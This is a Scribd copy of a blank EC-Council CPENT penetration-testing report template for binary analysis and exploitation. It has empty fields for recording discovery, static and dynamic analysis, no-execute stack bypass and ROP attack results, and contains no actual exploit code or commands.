Scribd
Upload
59 views

CPENT Module 13 Binary Analysis and Exploitation

Uploaded by

Oleg Pelsch
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
59 views

CPENT Module 13 Binary Analysis and Exploitation

Uploaded by

Oleg Pelsch
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

EC-Council Certified Penetration Testing Professional

Certified Penetration Testing Professional

Methodology: Binary Analysis and Exploitation

Penetration Tester:
Organization:
Date: Location:

Confidential 1 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 1: Binary Coding Concepts

Test 1.1: Analyze Binaries

Target Organization
URL
Application/Program
Tested
Commands Used

Analyzed Binaries Successfully? Yes No


Information Collected
Type of Data Headers Compositions Strings Entry Points
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Data Format

Any Other 1.
Information
2.
Collected
3.
4.
5.

Confidential 2 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 3 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2: Binary Analysis Methodology

Test 2.1: Binary Discovery

Target Organization
URL
Application/Program
Tested
Commands Used

List of Discovered 1.
Binaries
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 4 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2.2: Information Gathering

Target Organization
URL
Application/Program
Tested
Commands Used

Information Gathered Successfully? Yes No


Is the file executable? Yes No
Is the file binary? Yes No
Architecture of the binary X86 X86-64
Is the binary stripped of its symbol table? Yes No
Can any useful strings be identified within the binary? Yes No
Is there a running process associated with this binary? Yes No
Is the hash a known malicious file hash? Yes No
Can any useful function names be identified? Yes No
Can any libraries used to be identified? Yes No
Does the application take any input? Yes No
Specify the input taken by 1.
the Application
2.
3.
4.
5.

Does the application safely manage memory? Yes No


Does the application use up-to-date libraries or third-party frameworks? Yes No

Confidential 5 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Specify the libraries and 1.


third-party frameworks
2.
used by the Application
3.
4.
5.

How is the application


compiled?

Are there any noticeable strings containing sensitive data such as Yes No
hardcoded passwords?
Specify sensitive data 1.
stored in strings
2.
3.
4.
5.

Secure Hash Algorithm


(SHA) hash of the binary
Original Programming
Language used
Binary Written to Disk

Information Collected
Type of Data Headers Compositions Strings Entry Points
1.
2.
3.
4.
5.
6.
Data Format

Confidential 6 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 7 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2.3: Static Analysis

Target Organization
URL
Commands Used

Is Static Analysis Successful? Yes No


Information 1.
Extracted
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 8 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2.4: Dynamic Analysis

Target Organization
URL
Commands Used

Dynamic Analysis Successful? Yes No


Information 1.
Extracted
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 9 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2.5: Defeat the No-execute Stack

Target Organization
URL
Commands Used

Is Defeating the No-execute Stack Successful? Yes No


Program

External Location

Address of the
Environment
Variable
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:

Confidential 10 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Test 2.6: Attack using ROP

Target Organization
URL
Commands Used

Is Attack using ROP Successful? Yes No


Building Custom ROP Gadget Tool Successful? Yes No
Gadgets 1.
2.
3.
4.
5.

Addresses of the Gadgets 1.


2.
3.
4.
5.

Result of the Attack

Tools/Services Used 1.
2.
3.
4.
5.

Confidential 11 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
EC-Council Certified Penetration Testing Professional

Results Analysis:

Confidential 12 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.

You might also like